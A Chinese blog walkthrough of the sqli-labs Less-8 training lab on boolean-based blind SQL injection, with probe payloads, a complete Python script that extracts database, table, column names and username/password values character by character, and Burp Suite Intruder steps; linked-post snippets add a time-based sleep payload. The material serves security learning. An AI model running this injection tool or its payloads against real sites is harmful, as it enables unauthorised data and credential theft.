Less-8(盲注--布尔盲注)

最新推荐文章于 2024-05-21 19:05:10 发布
最新推荐文章于 2024-05-21 19:05:10 发布
阅读量1.1k 收藏 6
点赞数 1
分类专栏: # SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43901998/article/details/105267526
版权

文章目录

布尔盲注

在前面的练习中,也涉及到了布尔盲注的解题过程,思路都是一样的。自己构造判断语句强制页面进行判断并根据返回结果查看判断的正确性。

1. 关卡分析

本次的关卡是less-8,首先我们来分析一下这个页面。通过多次的尝试我们发现,如果输入的是true,那么就会返回一个You are in......,而如果是false,则不会返回任何的界面。因此我们可以根据这个信息来进行布尔盲注。

首先利用?id=1' and 1=1 --+?id=1' and 1=2 --+确定id的类型为单引号''包裹。然后进行盲注。

2. 盲注思路

由于盲注的过程,很繁琐,因此我们这里只提供一个大致的思路,而真正的破解过程,我编写了一个python程序,让他来完成。

下面来说思路:

  1. 破解当前数据库名:
    and length(database)=num破解名字长度。
    and ascii(substr(database(), 1,1))=num猜出每一个字母的ascii码。最后得到数据库的名字。

  2. 破解所有数据库名字
    and (select count(*) from information_schema.schemata)=num判断数据库的个数。
    and length((select schema_name from information_schema.schemata limit 0,1))=num判断每一个数据库的名字的长度。
    and ascii(substr((select schema_name from information_schema.schemata limit 0,1)), 1,1)=num猜解每一个数据库名字的每一个字母。最后得出数据库的名字。

  3. 破解数据表和表中的字段
    具体操作语法和2中破解数据库名字一样,只是查询的表变成了information_tablesinformation_columns

3. 编写工具进行通关

我们通过以上的语句,进行一个一个数据和尝试,最终能够破解数据库的所有信息。但是每次要通过若干次尝试,才能得到一个字母的值,很浪费时间,这么繁琐的工作,怎么能让人干呢?计算机不就是用来替人干脏活的么?因此我编写了一个程序,用来通关less-8。该程序只能实现一些基本功能,有不好的地方请见谅,我将代码放在下面,如果你们有兴趣的话可以改进一下。

#!/usr/bin/env python
# -*- encoding: utf-8 -*-

import requests
import re

class SQL_injection():
    def __init__(self, id, url, table_name='tables', db_name='information.schema',  *args):
        self.id = id
        self.url = url
        self.db_name = db_name
        self.table_name = table_name
        self.args = args

    # 访问操作
    # 判断检索字段返回值: 返回检索字段的数目
    # 盲注返回值: True返回1 False返回0
    def req(self, url, num):
        response = requests.get(url)
        # print(url)
        # print(response.text)
        result = re.search(r'color="#FFFF00">(.*?)<', response.text)
        # print(result)
        if result:
            if result.group(1) == "You are in...........":
                # print("连接正确")
                return num
            else:
                return 0
        else:
            return 0


    # 判断字段数目, 需要指定数据库和数据表
    def column_num(self):
        num = 0
        for i in range(1, 100):
            new_url1 = self.url + self.id + " order by %s --+ " % (i)
            # print(new_url1)
            flag = self.req(new_url1, i)
            if flag:
                num = flag
                print("\r网页搜索的字段数目为:%s" % flag, end="")
            if not flag:
                # print("xxx")
                break
        print()
        return num


    # 判断当前数据库名字
    def db_name1(self):
        length = 0
        for i in range(1,100):
            new_url = self.url + self.id + " and length(database())=%s  --+" % i
            flag = self.req(new_url, 1)
            if flag:
                length = i+1
                break

        if length == 0:
            print("数据库名字长度获取失败.....")
            return 0
        print("\n正在使用的数据库:", end='')
        for i in range(1, length):
            for k in range(95, 123):
                new_url = url + id + " and ascii(substr(database(), %s))=%s  --+" % (i, k)
                flag = self.req(new_url, 1)
                if flag:
                    print(chr(int(k)), end='')


    # 爆库,列出所有数据库名
    def db_list(self):
        length = 0
        # 爆出数据库个数
        for i in range(1, 10000):
            new_url = self.url + self.id + " and (select count(schema_name) from information_schema.schemata)=%s --+ " % i
            flag = self.req(new_url, 1)
            if flag:
                length = i
                print("\n一共有%s个数据库"%length)
                break

        # 一一爆出数据库的名字
        # 遍历每一行
        for i in range(0, length):
            # 求每一行数据库名字的长度
            for l in range(1, 100):
                # print(l)
                new_url = url + id + " and length((select schema_name from information_schema.schemata limit %s, 1))=%s --+ " % (i, l)
                # print(new_url)
                flag = self.req(new_url, 1)
                if flag:
                    db_name_length = l
                    print("%s. 数据库名字的长度: %s          数据库名:  "%(int(i+1), db_name_length), end='')

                    # 求数据库名字
                    for db_l in range(1, int(db_name_length) + 1):
                        for k in range(95, 123):
                            new_url = \
                                url + id + \
                                " and ascii(substr((select schema_name from information_schema.schemata limit %s,1), %s, 1)) =%s --+ " \
                                % (i, db_l, k)
                            flag = self.req(new_url, 1)
                            if flag:
                                print(chr(int(k)), end="")
                    print()
                    break


    # 爆表
    # 接受参数,网站链接,id, 指定数据库的名字
    def table_name1(self):
        length = 0
        # 爆出某个数据库中数据表个数
        if self.db_name:
            print("\n当前查询的数据库为 %s " % self.db_name)
            for i in range(1, 10000):
                new_url = url + id + " and (select count(table_name) from information_schema.tables where table_schema='%s')=%s --+ " % (self.db_name, i)
                flag = self.req(new_url, 1)
                if flag:
                    length = i
                    print("一共有%s张数据库表" % length)
                    break

            # 一一爆出数据表的名字
            for i in range(0, length):
                # 求每一行数据库名字的长度
                for l in range(1, 100):
                    # print(l)
                    new_url = url + id + " and length((select table_name from information_schema.tables where table_schema='%s' limit %s, 1))=%s --+ " % (self.db_name, i, l)
                    # print(new_url)
                    flag = self.req(new_url, 1)
                    if flag:
                        db_name_length = l
                        print("%s. 数据表名字的长度: %s          数据表名:  "%(int(i+1), db_name_length), end='')

                        # 求数据库名字
                        for db_l in range(1, int(db_name_length) + 1):
                            for k in range(95, 123):
                                new_url = \
                                    url + id + \
                                    " and ascii(substr((select table_name from information_schema.tables where table_schema='%s' limit %s,1), %s, 1)) =%s --+ " \
                                    % (self.db_name, i, db_l, k)
                                flag = self.req(new_url, 1)
                                if flag:
                                    print(chr(int(k)), end="")
                        print()
                        break


        # 如果没有指定数据库,那么则搜索整个DBMS有多少张表
        else:
            for i in range(1, 10000):
                new_url = url + id + " and (select count(table_name) from information_schema.tables)=%s --+ " % i
                flag = self.req(new_url, 1)
                if flag:
                    length = i
                    print("\n一共有%s个数据库表" % length)
                    break


    # 爆字段
    def columns_name(self):
        length=0
        print("\n当前查询的数据库为 %s, 数据表为 %s " % (self.db_name, self.table_name))
        for i in range(1, 10000):
            new_url = url + id + " and (select count(column_name) from information_schema.columns where table_schema='%s' and table_name='%s' )=%s --+ " % (
            self.db_name, self.table_name, i)
            flag = self.req(new_url, 1)
            if flag:
                length = i
                print("此表一共有%s个字段" % length)
                break

        # 一一爆出数据字段的名字
        for i in range(0, length):
            # 求每一个数据字段名称的长度
            for l in range(1, 100):
                # print(l)
                new_url = url + id + " and length((select column_name from information_schema.columns where table_schema='%s' and table_name='%s' limit %s, 1))=%s --+ " % (
                self.db_name, self.table_name, i, l)
                # print(new_url)
                flag = self.req(new_url, 1)
                if flag:
                    db_name_length = l
                    print("%s. 数据表名字的长度: %s          数据表名:  " % (int(i + 1), db_name_length), end='')

                    # 求数据库名字
                    for db_l in range(1, int(db_name_length) + 1):
                        for k in range(95, 123):
                            new_url = \
                                url + id + \
                                " and ascii(substr((select column_name from information_schema.columns where table_schema='%s' and table_name='%s' limit %s,1), %s, 1)) =%s --+ " \
                                % (self.db_name, self.table_name, i, db_l, k)
                            flag = self.req(new_url, 1)
                            if flag:
                                print(chr(int(k)), end="")
                    print()
                    break


    # 爆值
    def value(self):
        # print(self.args)
        args_len = len(self.args)
        length = 0
        for arg_len in range(0, args_len):
            for i in range(1, 100000):
                new_url = url + id + " and (select count(%s) from %s.%s)=%s --+ " % (self.args[arg_len], self.db_name, self.table_name, i)
                # print(new_url)
                if self.req(new_url, 1):
                    print("字段: %s --> %s  行" % (self.args[arg_len], i))
                    length = i
                    break

            # 求每一个字段的所有值
            for i in range(0, length):
                # 求每一个值名称的长度
                for l in range(1, 1000):
                    # print(l)
                    new_url = url + id + " and length((select %s from %s.%s limit %s, 1))=%s --+ " % (
                        self.args[arg_len], self.db_name, self.table_name, i, l)
                    # print(new_url)
                    flag = self.req(new_url, 1)
                    if flag:
                        db_name_length = l
                        # print("%s. %s字段长度: %s          值为:  " % (int(i + 1), args[arg_len], db_name_length), end='')
                        print("%s. %s :  " % (int(i + 1), self.args[arg_len]), end='')

                        # 求数值的名字
                        for db_l in range(1, int(db_name_length) + 1):
                            for k in range(33, 127):
                                new_url = \
                                    url + id + \
                                    " and ascii(substr((select %s from %s.%s limit %s,1), %s, 1)) =%s --+ " \
                                    % (self.args[arg_len], self.db_name, self.table_name, i, db_l, k)
                                # print(new_url)
                                flag = self.req(new_url, 1)
                                if flag:
                                    print(chr(int(k)), end="")
                        print()
                        break


if __name__ == "__main__":
    x = input("请输入您要练习的less: ")
    url = "http://127.0.0.1:7788/sqli/Less-%s/?id=" % x
    id = input("请入id形式")

    # sql = SQL_injection(id, url, table_name, db_name, args)
    sql = SQL_injection(id, url, 'users', 'security', 'username', 'password')
    # 获取当前使用的数据库的名字
    sql.db_name1()

    # 列出所有数据库的名字
    sql.db_list()

    # 列出指定数据库汇总所有数据表, 若没有指定数据库,则只显示有多少张表
    sql.table_name1()

    # 列指定表中所有的列
    sql.columns_name()

    # 列出指定字段的值
    sql.value()

在这里判断字母的时候,我是用的方法是,一个一个的测试并请求,并没有使用像二分查找那样高效的算法,所以在进行名字爆破的时候,速度相对较慢。但是由于范围不大,因此在样本不多的情况下,花费的时间还是比较乐观的。
我们看一下结果:
在这里插入图片描述
在这里插入图片描述
可以看到,程序已经替我们做了繁琐的判断操作,把数据库内部的信息完整的呈现出来了。如果有觉得执行速度慢的小伙伴,可以使用查找算法来优化一下这个代码。

后来,我有对前面的less尝试了一下,也可以用这个代码去通关前面的一些可以使用布尔盲注的题目,只需要改一下页面返回的判断语句即可。好了,到此为止,我们的less-8就算是成功拿下了!

4. 使用burp suite

在这里我们使用burp suit也可以实现。
这里我就只展示一个破解当前数据库名字的第一个字母的操作(其他操作都一样)
首先我们要构造一条sql语句。
http://192.168.xxx.xxx:7788/sqli/Less-8/?id=1' and ascii(substr(database(), 1, 1))=1 --+
注意:这里在访问的时候,要使用你本机的私网IP地址,因为127.0.0.1这个IP地址。burp suit拦截不到。

在这里插入图片描述
访问后我们开启burp suite拦截,并发送到Intruder模块。
在这里插入图片描述
然后点击payloads
在这里插入图片描述
配置好以后,点击Start attack开始。
在这里插入图片描述
最后我们在115这里,发现和别的response长度不同,点开相应查看,发现页面存在You are in.....字段,那么第一个字母的ascii就是115,查阅ascii表得知115对应的字母就是s

那么下面我们对整个名字爆破:
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
最終,查閲ascii表就可以知道,数据库名字为security

以上就是burp suite解体的思路,如果对burp suite掌握熟练的朋友,也可以用burp suite进行破解。

老司机开代码
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Less-8 【布尔
tubug的博客
05-20 459
由上可知我们利用单引号想它发报错然后显示我们想要的信息,但是它并不会显示报错的信息,只显示一个错误的页面。这时候我们尝试利用异常报错的方式来查看是否会显示我们想要的信息。发现它异常报错不会抛出异常错误信息,利用单引号也无法让它显示报错信息,这时候我们就可以利用布尔的方式进行猜解。布尔:我们测试一个字符利用网址对或错的回显,来判断它的内容信息。以此类推比对各种ascii码,我们可知当前数据库所有表的名称为。以此类推比对各种ascii码,我们可知当前数据库的名称为。:就是什么都没有,类似人。
LESS-8 ~LESS-12
qq_44598397的博客
03-20 525
LESS-8 此处不同于第5关的是:这里的报错被释掉了,故不能用报错入,可以延时入和布尔入 延时入: http://127.0.0.1/sqlilabs/Less-8/?id=1' and if(ascii(substr(database(),1,1))=115,1,sleep(5))–+ : http://127.0.0.1/sqlilabs/Less-8/?id=1' and ...
sql入less8——布尔
最新发布
m0_62903168的博客
05-21 293
可这个效率依旧太差了,因为代码中有两个for循环,大大增加了查询时间,因此我们用二分查找来增加脚本效率。查询语句:id=1' and substr(database(),1,1) = 's' --+查询语句:id=1' and substr(database(),1,1) = 'a' --+因为这样一次一次的去输入,去判断,所需时间确实太久了,所以用脚本来实现是最好的。
SQL入漏洞解析-less-8(布尔)
duoba_an的博客
02-27 2073
id=1' and (select ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1)))=117 --+ 爆的i。最后入出了数据库名称,后边的就是表和列的查询,和之前的都一样,只不过这里是要用ASCII码来猜而已,就是有点慢。就这样一个一个爆,出来之后在对照ASCII码表就能查出数据。他只有对和错显示,那我们只能用对或者错误来猜他这个数据库。
sqli-labs(less-8)
墨鱼菜鸡
09-10 281
目录 less-8(布尔)手工 1.判断闭合方式 2.判断数据库个数 3.判断第一个数据库字符长度 4.根据ascii码判断每个库名的具体字符 5.判断security库中表的个数 6.判断security库里第一个表名的长度 7.判断security库里第一个表的第一个字符的ascii值 8.判断security.users表的...
Sqli-labs之Less-8
→_→
03-30 1778
Less-8 GET--基于布尔值-单引号 根据题目提示可知这是单引号入且需要通过进行通关,那么首先利用单引号看一下网页的回显: 测试是否是入点 发现什么也没有,也就是说网页不会返回任何报错信息,也不会返回其他信息即没有任何回显信息, Less1、5、7、8回显对比 ...
less-plugin-autoprefix:添加了由 autoprefixer 对 less 进行后处理的能力
05-29
npm install -g less-plugin-autoprefix 然后在命令行上, lessc file.less --autoprefix="browsers" 浏览器是由逗号分隔的列表。 程序化用法 var LessPluginAutoPrefix = require ( 'less-plugin-autoprefix' )...
less-plugin-clean-css:使用clean-css对CSS进行后期处理和压缩
02-23
npm install -g less-plugin-clean-css 然后在命令行上 lessc file.less --clean-css="--s1 --advanced --compatibility=ie8" 见的可用命令选项-唯一的区别是advanced和rebase ,我们默认为false,因为它并不总是...
less-plugin-lists:更少的ListArray操作
05-13
少插件列表 用于列表/数组操作的插件。...npm install -g less-plugin-lists 与lessc使用 lessc --lists file.less 有关通过命令行Less编译器使用插件的更多详细信息,请参见Less文档中的相应部分。
less-loader:编译不到CSS
04-29
首先,您需要安装less less-loader : $ npm install less less-loader --save-dev 然后将加载程序添加到您的webpack配置中。 例如: webpack.config.js module . exports = { module : { rules : [ { test ...
SQL入之基于布尔详解
09-10
如上述例子所示,`http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>60 %23`这样的入尝试用于获取...
SQL入学习——Bool详解 sqli-labs(Less 8)
未完成的歌~的博客
07-29 6176
Less-7导出文件GET字符型 打开页面输入?id=1 试了很多发现报错信息都一样,查看下源代码: if($row) { echo '<font color= "#FFFF00">'; echo 'You are in.... Use outfile......'; echo "<br>"; echo "</font>"; ......
sqlilabs Less-8 浅学习
m0_63253040的博客
03-23 1142
布尔学习 学习博客 页面只会返回True和False两种结果 以这关为例,当结果为True时返回You are in...,结果为False时无回显结果 布尔需要用到的主要函数 Length()函数 返回字符串的长度 Substr()截取字符串 Ascii()返回字符的ascii码 sleep(n):将程序挂起一段时间 n为n秒 if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句 第一步
Less-8】布尔
ssrf
10-29 1356
目录一、知识铺垫1、substr字符串截取函数2、sql中limit使用3、python中的string模块二、布尔复现1、测试入点2、判断数据库名长度3、猜数据库名4、判断表名长度5、猜表名6、判断字段名长度7、猜字段名8、判断数据长度9、猜数据 一、知识铺垫 SQL操作函数: 1、substr字符串截取函数 语法: substr(string,start,length) 例如: select substr(‘abcdefg’,3,4) from dual;【结果是cdef】 select .
手工和burp两种方式的布尔及Sqli-labs Less 8
信安小菜鸡的博客
04-29 571
布尔 开发人员屏蔽了报错信息,只返回真假的两种情况能够进行布尔 布尔的关键点在于将表达式结果与已知值进行对比,根据对比结果判断正确与否 布尔的判断方式 通过长度判断 length():length(database())>=x 通过字符判断 substr():substr(database(),1,1) =‘s’ 通过 ascII 码判断:ascii():ascii(substr(database(),1,1)) =x Sqli-labs Less 8实践 判断数据库名长度 此处采
Sqli-labs less 8
weixin_34347651的博客
08-11 335
Less-8 经过简单的测试,我们发现 'or 1=1--+返回正常,那么我们就基本知道应该怎么使用了,参考less5.这里简单的进行一个示例: http://127.0.0.1/sqllib/Less-8/?id=1%27and%20If(ascii(substr(database(),1,1))=115,1,sleep(5))--+ 这里用的延时入,当然了我们使用布尔类型的入...
sqli-labs (less7-less8) & 菜刀用法
Xi4or0uji
07-25 1010
less 7 outfile&amp;菜刀用法 这关没什么好说的,主要讲讲菜刀用法 首先还是先讲一下这关好吧 ?id=1'会报错,?id=1"则说you are in...use outfile.... 后台语句是$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1"; 所以用?id=1'))--+是可以闭合的,重点不是这里,题目...
【SQLI-Lab】-Less8
xinyue9966的博客
01-26 342
Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET)前言一、GET字符型入二、步骤总结 前言 一、GET字符型入 执行数据库查询,并在回显点展示。 用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行入,并从回显点中获取想要的信息。 二、步骤 和第7题思路过程一样,不过不需要写入、闭合字段后,开始用burp suite爆,具体过程不再细讲。 爆库长度payload
sqli-labs-less-8
09-27
sqli-labs-less-8是一个用于学习SQL入的实验题目。在这个实验中,通过在GET请求中使用闭合单引号和布尔值来进行攻击。具体的步骤如下: 1. 在URL中输入id参数,并在参数值后添加闭合单引号,例如?id=1' 2. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值